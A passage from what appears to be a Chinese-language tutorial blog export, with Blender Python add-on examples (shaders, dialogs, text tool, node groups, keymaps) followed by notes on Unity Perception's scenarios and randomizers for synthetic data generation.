    add2_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add2_node.location = (0,0)
    # Setting the Label
    add2_node.label = "Add 2"
    # Minimizes the Node
    add2_node.hide = True
    # Deselect the Node
    add2_node.select = False

    # Adding Glass4 Node
    glass4_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass4_node.location = (-150, -150)
    # Setting the Default Color
    glass4_node.inputs[0].default_value = (1, 1, 1, 1)
    # Setting the Default IOR Value
    glass4_node.inputs[2].default_value = 1.450
    # Deselect the Node
    glass4_node.select = False

    # Create the Mix Shader Node and Reference it as 'Mix1'
    mix1_node = material_diamond.node_tree.nodes.new('ShaderNodeMixShader')
    # Setting the Location
    mix1_node.location = (200,0)
    # Deselect the Node
    mix1_node.select = False

    # Creating Links between the Nodes
    material_diamond.node_tree.links.new(glass1_node.outputs[0], add1_node.inputs[0])
    material_diamond.node_tree.links.new(glass2_node.outputs[0], add1_node.inputs[1])
    material_diamond.node_tree.links.new(add1_node.outputs[0], add2_node.inputs[0])
    material_diamond.node_tree.links.new(glass3_node.outputs[0], add2_node.inputs[1])
    material_diamond.node_tree.links.new(add2_node.outputs[0], mix1_node.inputs[1])
    material_diamond.node_tree.links.new(glass4_node.outputs[0], mix1_node.inputs[2])
    material_diamond.node_tree.links.new(mix1_node.outputs[0], material_output.inputs[0])
    bpy.context.object.active_material = material_diamond

    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ShaderMainPanel)
    bpy.utils.register_class(SHADER_OT_DIAMOND)


    def unregister():
    bpy.utils.unregister_class(ShaderMainPanel)
    bpy.utils.unregister_class(SHADER_OT_DIAMOND)


    if __name__ == '__main__':
    register()

    Edit-Preferences-Add-ons-搜索extra-Add Mesh: Extra Objects,这样 Blender 中就可以创建钻石形状的物体。

    jpg

    创建一个钻石形状的物体,运行代码,点击 Diamond,就给该物体添加了一个 Shader:

    jpg

    可以从 Darkfall : Blender Python Tutorial: How to create an Add-on - The Shader Library [bpy] (darkfallblender.blogspot.com) 中的 ShaderLibrary.py - Google Drive 下载作者写的更复杂的 ShaderLibrary.py

    Add a keyframe & Modifier with Python [learn python for beginners]

    这段代码定义了一个名为"Hello World Panel"的 Blender 插件,该插件提供了一个名为"Neon"的着色器,可以在 3D 视图的工具栏中的"Name your New Tab"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"Add Neon Shader"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了一个名为 HelloWorldPanel 的面板类,该类作为面板的主要控件,用于渲染用户界面。该面板包含一个按钮,名为"shader.neon_operator"。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为蓝色、灰色的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Neon 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    import bpy


    class HelloWorldPanel(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Hello World Panel"
    bl_idname = "OBJECT_PT_hello"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Name your New Tab"

    def draw(self, context):
    layout = self.layout

    obj = context.object

    row = layout.row()
    row.operator('shader.neon_operator')


    class SHADER_OT_NEON(bpy.types.Operator):
    bl_label = 'Add Neon Shader'
    bl_idname = 'shader.neon_operator'

    def execute(self, context):
    cur_frame = bpy.context.scene.frame_current

    # Creating a New Shader and calling it Neon
    material_neon = bpy.data.materials.new(name= "Neon")
    # Enabling Use Nodes
    material_neon.use_nodes = True

    tree = material_neon.node_tree

    # removing the Principled Node
    material_neon.node_tree.nodes.remove(material_neon.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_neon.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (400,0)

    # Adding Glass1 Node
    emiss_node = material_neon.node_tree.nodes.new('ShaderNodeEmission')
    # Set location of node
    emiss_node.location = (200,0)
    # Setting the Default Color
    emiss_node.inputs[0].default_value = (0.59, 0.76, 1, 1)
    # Setting the Default IOR Value
    emiss_node.inputs[1].default_value = 2
    emiss_node.inputs[1].keyframe_insert('default_value', frame=cur_frame)

    data_path = f'nodes["{emiss_node.name}"].inputs[1].default_value'

    fcurves = tree.animation_data.action.fcurves
    fc = fcurves.find(data_path)
    if fc:
    new_mod = fc.modifiers.new('NOISE')
    new_mod.strength = 10
    new_mod.depth = 1

    material_neon.node_tree.links.new(emiss_node.outputs[0], material_output.inputs[0])

    return {'FINISHED'}

    def register():
    bpy.utils.register_class(HelloWorldPanel)
    bpy.utils.register_class(SHADER_OT_NEON)


    def unregister():
    bpy.utils.unregister_class(HelloWorldPanel)
    bpy.utils.unregister_class(SHADER_OT_NEON)


    if __name__ == "__main__":
    register()

    创建了一个 shader 和一个 modifiers,使得绑定的物体一闪一闪的。

    jpg

    Create a popup dialog box

    定义了一个 WM_OT_myOp 类,提供了一个 dialog box 提示,原视频的 Blender 版本有点旧,替换了一些代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)

    整合到之前的 AddObjectScript.py 中,代码 row.operator('wm.myop', icon='CUBE', text='Cube') 将创建的 bl_idname = 'wm.myop'WM_OT_myOp 加入到 TestPanel 中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',
}

import bpy


class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
        layout = self.layout
        layout.scale_y = 1.4

        row = layout.row()
        row.label(text='Add an object', icon='OBJECT_ORIGIN')
        row = layout.row()
        row.operator('wm.myop', icon='CUBE', text='Cube')
        row = layout.row()
        row.operator('mesh.primitive_cube_add', icon='CUBE')
        row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
        row = layout.row()
        row.operator('object.text_add', icon='FILE_FONT')


class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout
        obj = context.object

        row = layout.row()
        row.label(text='Select an option to scale your object.', icon='FONT_DATA')
        row = layout.row()
        row.operator('transform.resize')
        row = layout.row()
        layout.scale_y = 1.2

        col = layout.column()
        col.prop(obj, 'scale')


class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.label(text='Select a Special Option', icon='COLOR_BLUE')
        row = layout.row()
        row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
        row.operator('object.subdivision_set')
        row = layout.row()
        row.operator('object.modifier_add')


class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):
        t = self.text
        s = self.scale

        bpy.ops.mesh.primitive_cube_add()
        obj = bpy.context.object
        obj.name = t
        obj.scale[0] = s[0]
        obj.scale[1] = s[1]
        obj.scale[2] = s[2]

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.register_class(WM_OT_myOp)


def unregister():
    bpy.utils.unregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.unregister_class(PanelB)
    bpy.utils.unregister_class(WM_OT_myOp)


if __name__ == '__main__':
    register()

Run it! Clicking OK creates a cube with the given name and Scale.
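For quick testing, the operator can also be invoked from Blender's Python console instead of the panel button; a minimal sketch using the names defined above:

import bpy

# Open the dialog, just like the panel button does
bpy.ops.wm.myop('INVOKE_DEFAULT')

# Or skip the dialog and pass the operator's properties directly
bpy.ops.wm.myop(text='MyCube', scale=(2.0, 1.0, 1.0))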


    Creating the Text Tool Add-on

This is a simple Blender add-on that provides a "Text Tool" panel for adding text objects. It exposes a few options, such as the text content, the scale, whether to center the origin, and whether to extrude.

At the top of the code, the bl_info dictionary defines the add-on's basic information: name, author, version, required Blender version, description, and so on. Blender uses this information to display and identify the add-on.

The OBJECT_PT_TextTool class defines the add-on's UI panel. The panel contains a button that invokes the WM_OT_textOp operator class to add the specified text object.

The WM_OT_textOp operator class defines the process of adding a text object: its execute() method adds the text object to the scene, and its invoke() method shows a properties dialog so the user can set the text object's attributes.

At the end of the code, register() registers the add-on's classes and unregister() removes them, so that Blender can display the add-on correctly and make it available when needed.

bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
}

import bpy

class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def execute(self, context):
        t = self.text
        s = self.scale
        c = self.center
        e = self.extrude
        ea = self.extrude_amount

        bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
        bpy.ops.font.delete(type='PREVIOUS_WORD')
        bpy.ops.font.text_insert(text=t)
        bpy.ops.object.editmode_toggle()

        if e == True:
            bpy.context.object.data.extrude = ea

        if c == True:
            bpy.context.object.data.align_x = 'CENTER'
            bpy.context.object.data.align_y = 'CENTER'
        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.unregister_class(WM_OT_textOp)


if __name__ == "__main__":
    register()

This creates a text object; centering it and giving it depth (extrude) are both optional.


    Create Custom Node Group

A Blender node group bundles several nodes together so they can be reused across scenes. By creating a custom node group, you define a set of nodes once and reuse it whenever needed, instead of wiring up the same nodes by hand every time.

A node group can expose multiple inputs and outputs, which makes it flexible to use. For example, you can encapsulate an algorithm in a custom node group and then call it repeatedly like a subroutine, making the whole workflow more efficient.

Node groups also hide internal complexity by wrapping multiple nodes together, which simplifies the structure and management of a project. If you want to share a node group or use it in another project, you can save it in a .blend file or as a Python script.

In short, node groups are one of Blender's most practical features: they improve productivity, simplify project management, and make Blender more powerful and flexible.
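As a side note on reuse: a node group saved in another .blend file can be appended from Python before it is instanced. A minimal sketch, assuming a file groups.blend that contains a node group named 'Test Node' (both names are placeholders):

import bpy

# Append the node group datablock from another .blend file
path = '/path/to/groups.blend'  # placeholder path
with bpy.data.libraries.load(path) as (data_from, data_to):
    if 'Test Node' in data_from.node_groups:
        data_to.node_groups = ['Test Node']

# The appended group is now available under bpy.data.node_groups
group = bpy.data.node_groups.get('Test Node')
print(group)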

The following code is a Blender add-on that creates a custom node group.

First, it defines a NODE_PT_MAINPANEL class derived from bpy.types.Panel: a panel in the UI region of the node editor (NODE_EDITOR), placed under a "New Tab" category. bl_label sets the panel name to "Custom Node Group", and bl_idname is the unique ID used to reference the panel in code.

The create_test_group() function creates the node group. It takes three parameters: a context object, an operator object, and a group_name string. It creates a new node group object with bpy.data.node_groups.new() and sets its type to 'CompositorNodeTree', meaning a compositor node tree. It then creates input and output nodes plus two intermediate nodes, links them together, and finally returns the newly created node group object.

The NODE_OT_TEST class derives from bpy.types.Operator and represents an operator; bl_label is its display name and bl_idname its unique ID. Its execute() method is called when the operator runs: it calls create_test_group() to build the custom node group and adds it to the scene.

Finally, register() and unregister() register and unregister the add-on. register_class() and unregister_class() add and remove the panel (NODE_PT_MAINPANEL) and the operator (NODE_OT_TEST) so they are available in Blender. The if __name__ == "__main__": block lets the script be run directly; its register() call registers the add-on with Blender so it can be used at runtime.

import bpy


class NODE_PT_MAINPANEL(bpy.types.Panel):
    bl_label = "Custom Node Group"
    bl_idname = "NODE_PT_MAINPANEL"
    bl_space_type = 'NODE_EDITOR'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('node.test_operator')


def create_test_group(context, operator, group_name):

    # enable use nodes
    bpy.context.scene.use_nodes = True

    test_group = bpy.data.node_groups.new(group_name, 'CompositorNodeTree')

    group_in = test_group.nodes.new('NodeGroupInput')
    group_in.location = (-200, 0)
    test_group.inputs.new('NodeSocketFloat', 'Factor Value')  # 0
    test_group.inputs.new('NodeSocketColor', 'Color Input')  # 1

    group_out = test_group.nodes.new('NodeGroupOutput')
    group_out.location = (400, 0)
    test_group.outputs.new('NodeSocketColor', 'Output')

    mask_node = test_group.nodes.new(type='CompositorNodeBoxMask')
    mask_node.location = (0, 0)
    mask_node.rotation = 1

    mix_node = test_group.nodes.new(type='CompositorNodeMixRGB')
    mix_node.location = (200, 0)
    mix_node.use_clamp = True
    mix_node.blend_type = 'OVERLAY'

    link = test_group.links.new

    link(mask_node.outputs[0], mix_node.inputs[1])

    link(group_in.outputs[0], mix_node.inputs[0])
    link(group_in.outputs[1], mix_node.inputs[2])

    link(mix_node.outputs[0], group_out.inputs[0])

    return test_group


class NODE_OT_TEST(bpy.types.Operator):
    bl_label = "Add Custom Node Group"
    bl_idname = "node.test_operator"

    def execute(self, context):

        custom_node_name = "Test Node"
        # arguments in the order the function expects: (context, operator, group_name)
        my_group = create_test_group(context, self, custom_node_name)
        test_node = context.scene.node_tree.nodes.new('CompositorNodeGroup')
        test_node.node_tree = bpy.data.node_groups[my_group.name]
        test_node.use_custom_color = True
        test_node.color = (0.5, 0.4, 0.3)

        return {'FINISHED'}


def register():
    bpy.utils.register_class(NODE_PT_MAINPANEL)
    bpy.utils.register_class(NODE_OT_TEST)


def unregister():
    bpy.utils.unregister_class(NODE_PT_MAINPANEL)
    bpy.utils.unregister_class(NODE_OT_TEST)


if __name__ == "__main__":
    register()

    Custom Drawing / Layout Improvements

This beautifies the UI of the earlier TextTool.py:

bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
}

import bpy

class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    rotation: bpy.props.BoolProperty(name='Z up', default=False)
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def draw(self, context):
        layout = self.layout
        layout.separator(factor=1)
        layout.label(text='Sample Text')

        layout.prop(self, 'text')
        layout.prop(self, 'scale')

        layout.separator(factor=2)

        box = layout.box()

        row = box.row()
        row.prop(self, 'rotation')
        if self.rotation == True:
            row.label(text='Orientation: Z UP', icon='EMPTY_SINGLE_ARROW')
        else:
            row.label(text='Orientation: Default', icon='ARROW_LEFTRIGHT')

        row = box.row()
        row.prop(self, 'center')
        if self.center == True:
            row.label(text='Alignment: Center', icon='ALIGN_CENTER')
        else:
            row.label(text='Alignment: Default', icon='ALIGN_LEFT')

        row = box.row()
        row.prop(self, 'extrude')
        if self.extrude == True:
            row.prop(self, 'extrude_amount')

    def execute(self, context):
        t = self.text
        s = self.scale
        c = self.center
        e = self.extrude
        ea = self.extrude_amount
        r = self.rotation

        bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
        bpy.ops.font.delete(type='PREVIOUS_WORD')
        bpy.ops.font.text_insert(text=t)
        bpy.ops.object.editmode_toggle()

        if r == True:
            bpy.context.object.rotation_euler[0] = 1.5708
        if e == True:
            bpy.context.object.data.extrude = ea

        if c == True:
            bpy.context.object.data.align_x = 'CENTER'
            bpy.context.object.data.align_y = 'CENTER'
        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.unregister_class(WM_OT_textOp)


if __name__ == "__main__":
    register()


    Shortcut / Custom Keymap [learn python for beginners]

Modify popupdialogboxTemplate.py so the dialog box can be opened by pressing SHIFT+F:

import bpy

class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):
        t = self.text
        s = self.scale

        bpy.ops.mesh.primitive_cube_add()
        obj = bpy.context.object
        obj.name = t
        obj.scale[0] = s[0]
        obj.scale[1] = s[1]
        obj.scale[2] = s[2]

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


addon_keymaps = []


def register():
    bpy.utils.register_class(WM_OT_myOp)

    wm = bpy.context.window_manager
    kc = wm.keyconfigs.addon
    if kc:
        km = kc.keymaps.new(name='3D View', space_type='VIEW_3D')
        kmi = km.keymap_items.new('wm.myop', type='F', value='PRESS', shift=True)
        addon_keymaps.append((km, kmi))


def unregister():
    for km, kmi in addon_keymaps:
        km.keymap_items.remove(kmi)
    addon_keymaps.clear()
    bpy.utils.unregister_class(WM_OT_myOp)


if __name__ == '__main__':
    register()

Press SHIFT+F in the 3D View to open the dialog box:


    ]]>
    @@ -6431,7 +6431,7 @@ /posts/Diary-%E4%BC%BC%E4%B9%8E%E5%BE%88%E5%B9%B3%E6%B7%A1%E7%9A%84%E7%AC%AC%2013%20%E5%91%A8%E5%92%8C%E7%AC%AC%2014%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -6458,7 +6458,7 @@ /posts/Unity-Perception%20Synthetic%20Data-Features%20Overview/ - 大纲

    Fundamentals

| Feature | Description |
| --- | --- |
| Perception Camera | Captures RGB images and ground truth from a Camera |
| SOLO Schema | Schema for annotation, metric, and ground-truth data for the default SOLO endpoint |
| Labeling | A component that marks a GameObject and its descendants with a set of labels |
| Label Config | An asset that defines a taxonomy of labels for ground truth generation |
| Randomization | The Randomization tool set lets you integrate domain randomization principles into your simulation. |
| FAQ | Frequently Asked Questions about common workflows and issues. |
| Legacy Perception Schema | Schema for annotation, metric, and ground-truth data for the legacy Perception endpoint |

    Labeling

| Feature | Description |
| --- | --- |
| Labeling | A component that marks a GameObject and its descendants with a set of labels |
| Label Config | An asset that defines a taxonomy of labels for ground truth generation |
| Bounding Box 2D Labeler | Capture 2D bounding boxes for visible labeled objects. |
| Hierarchical Bounding Boxes | How to combine bounding boxes of objects with parent-child hierarchical relationships during runtime. |
| Bounding Box 3D Labeler | Capture 3D bounding boxes for visible labeled objects. |
| Keypoint Labeler | Record the screen locations of specific points on labeled objects such as keypoints on humans. |
| Metadata Labeler | Reporting object-level or environment-level metadata information during runtime. |

    Randomization

| Feature | Description |
| --- | --- |
| Randomization | The Randomization toolset lets you integrate domain randomization principles into your simulation. |
| Scenarios | Scenarios control execution flow of your simulation – how many iterations to run the simulation, what randomizers to use, etc. |
| Randomizers | Randomizers encapsulate specific randomization activities to perform during the lifecycle of a randomized simulation. |
| Randomizer Tags | RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation. |
| Parameters | Parameters are classes that utilize Samplers to deterministically generate random typed values. |
| Samplers | Samplers generate bounded random float values by sampling from probability distributions. |

    Data Generation

| Feature | Description |
| --- | --- |
| Perception Camera | Captures RGB images and ground truth from a Camera. |
| Dataset Capture | Ensures sensors are triggered at proper rates and accepts data for the JSON dataset. |
| Output Endpoint | Currently supported output endpoints are: No Output, Perception endpoint, and Solo endpoint. |
| Metadata Labeler | Reporting object-level or environment-level metadata information during runtime. |

Resources

Original documentation: com.unity.perception/index.md at main · Unity-Technologies/com.unity.perception · GitHub

    API

    Labeling

    Label Config

    Bounding Box 2D Labeler

    Hierarchical Bounding Boxes

    Bounding Box 3D Labeler

    Keypoint Labeler

    Metadata Labeler

Randomization

The Randomization toolset integrates randomization into synthetic dataset generation:

1. Parameters used for randomization
2. Samplers that pick random values for the Parameters
3. Scenarios that coordinate the complete randomization process

The randomization workflow:

1. Create a Scenario
2. Define Randomizers and add them to the Scenario
3. Configure the Parameters and Samplers inside the Randomizers
4. Generate randomized training data for CV

Scenarios

The predefined Fixed Length Scenario, loaded on an empty object in the scene:

A Scenario has three tasks:

1. Control the execution flow of the simulation
2. Organize the list of Randomizers
3. Define settings that can be configured from outside a built Unity player

By default, Perception includes one ready-made Scenario, the FixedLengthScenario class. This scenario runs each Iteration for a fixed number of frames to create a dataset of a specified size.

Scenario Lifecycle Hooks

Scenarios have a number of lifecycle hooks that are invoked in a fixed order over the course of a typical scenario run.

JSON Configuration

A scenario can be serialized to JSON, then modified and imported at runtime to configure simulation behavior, even after a Unity player has been built. By default, the following scenario settings can be serialized with the Generate JSON Config button in the scenario's inspector:

1. Scenario constants
2. String, numeric, and boolean fields on Randomizers and Parameters
3. The configuration of Constant, Uniform, and Normal samplers

Here is an example of loading a scenario JSON configuration into a Windows Unity player with the --scenario-config-file flag: `.\PerceptionTutorial.exe --scenario-config-file scenarioConfiguration.json`
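Because the configuration is plain JSON, it can also be patched programmatically before each run. A minimal Python sketch; the key path below is a placeholder to adapt to the structure your Generate JSON Config button actually produced:

import json
import subprocess

config_path = 'scenarioConfiguration.json'

with open(config_path) as f:
    config = json.load(f)

# Placeholder key path: adjust to your generated config's structure
config['constants']['totalIterations'] = 500

with open(config_path, 'w') as f:
    json.dump(config, f, indent=2)

# Launch the built player with the patched configuration
subprocess.run(['PerceptionTutorial.exe', '--scenario-config-file', config_path])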

Implementing Custom Scenarios

For use cases where a scenario should run for an arbitrary number of frames, a custom scenario may be needed. These are the scenario properties most commonly overridden to implement custom iteration conditions:

1. isScenarioReadyToStart – the condition that determines when the scenario can begin iterating
2. isIterationComplete – the condition that determines when a scenario iteration ends
3. isScenarioComplete – the condition that determines when the scenario stops iterating

Abstract Scenario Classes

When deriving a custom scenario, there are two abstract scenario classes to choose from, depending on your needs:

1. Scenario<T>: the most basic scenario class to derive from if you only need the basic scenario lifecycle coordination tools
2. PerceptionScenario<T>: the perception scenario abstract class adds some useful functionality for scenarios that intend to generate datasets using the perception package's data capture tools.

Scenario Constants

Constants are the properties that configure a scenario's lifecycle settings, such as the starting iteration value or the total iteration count. By deriving your own constants class, you can add custom scenario settings to configure additional scenario properties. Below is the Constants class used in the FixedLengthScenario class:

[Serializable]
public class Constants : ScenarioConstants
{
    public int totalIterations = 100;
    public int framesPerIteration = 1;
}

1. Make sure to include the [Serializable] attribute on a constants class. This ensures that the constants can be configured properly from the Unity inspector.
2. The Scenario class's SerializeToJson() and DeserializeFromJson() methods can be overridden to implement a custom serialization strategy.

Randomizers

Randomizers encapsulate specific randomization activities to perform during the execution of a randomized simulation. For example, there are Randomizers for spawning objects, repositioning lights, varying the color of objects, and so on. Randomizers expose random parameters in their inspector interface to further customize these variations. Users can add a set of Randomizers to a Scenario to define an ordered list of randomization activities to perform over the simulation's lifecycle.

To define an entirely new Randomizer, derive the Randomizer class and implement one or more of the methods listed in the section below to randomize GameObjects while the simulation runs.

Randomizers added to the Scenario class

Randomizer Hooks

1. OnCreate() - called when the Randomizer is added or loaded to a Scenario
2. OnIterationStart() - called at the start of a new Scenario Iteration
3. OnIterationEnd() - called after a Scenario Iteration has completed
4. OnScenarioComplete() - called after the entire Scenario has completed
5. OnStartRunning() - called on the first frame a Randomizer is enabled
6. OnStopRunning() - called on the first frame a disabled Randomizer is updated
7. OnUpdate() - executed every frame for enabled Randomizers

Randomizer Coding Example

Below is the code for the rotation Randomizer example included in the Perception package:

[Serializable]
[AddRandomizerMenu("Perception/Rotation Randomizer")]
public class RotationRandomizer : Randomizer
{
    public Vector3Parameter rotation = new Vector3Parameter();

    protected override void OnIterationStart()
    {
        var taggedObjects = tagManager.Query<RotationRandomizerTag>();
        foreach (var taggedObject in taggedObjects)
            taggedObject.transform.rotation = Quaternion.Euler(rotation.Sample());
    }
}

Randomizer Library

Light Randomizer: targets all objects with a Light Randomizer Tag attached.

Light Randomizer Tag: must be attached to a GameObject that has a Light component.

Parameters that can be randomized:

1. The probability of the light being switched on or off
2. Light intensity
3. Light temperature
4. Light color

Material Property Randomizer: targets all objects with a Material Property Randomizer Tag attached.

Material Property Randomizer Tag: must be attached to a GameObject that has some kind of Renderer component (MeshRenderer, BillboardRenderer, etc.).

For the selected material's shader, specify which shader properties to modify and the ranges within which to modify them.

Material Swapper: targets all objects with a Material Swapper Tag attached.

Material Swapper Tag: must be attached to a GameObject that has a Material component.

Given a list of materials, each iteration swaps the given GameObject's material for one sampled from the list.

Scene Randomizer: given a list of scenes, loads one scene from the list every n iterations.

None of the scenes in the list should have a scenario component, since only one scenario component can be active at a time. The randomizers specified in the starting component's scenario persist and act on objects in the newly loaded scene.

Sky Randomizer: targets all objects with a Skybox Randomizer Tag attached.

Sky Randomizer Tag: must be attached to a GameObject that has a Volume component (?).

Substance Randomizer: targets all objects with a Substance Randomizer Tag attached.

Substance Randomizer Tag: must be attached to a GameObject that has a SubstanceGraph component.

This one seems advanced but not very stable yet; probably best used sparingly. (I have not worked with the SubstanceGraph component.)


Transform Randomizer: targets all objects with a Transform Randomizer Tag attached.

Transform Randomizer Tag: can be attached to any GameObject.

1. Translation
   1. Enabled or not
   2. Translation range
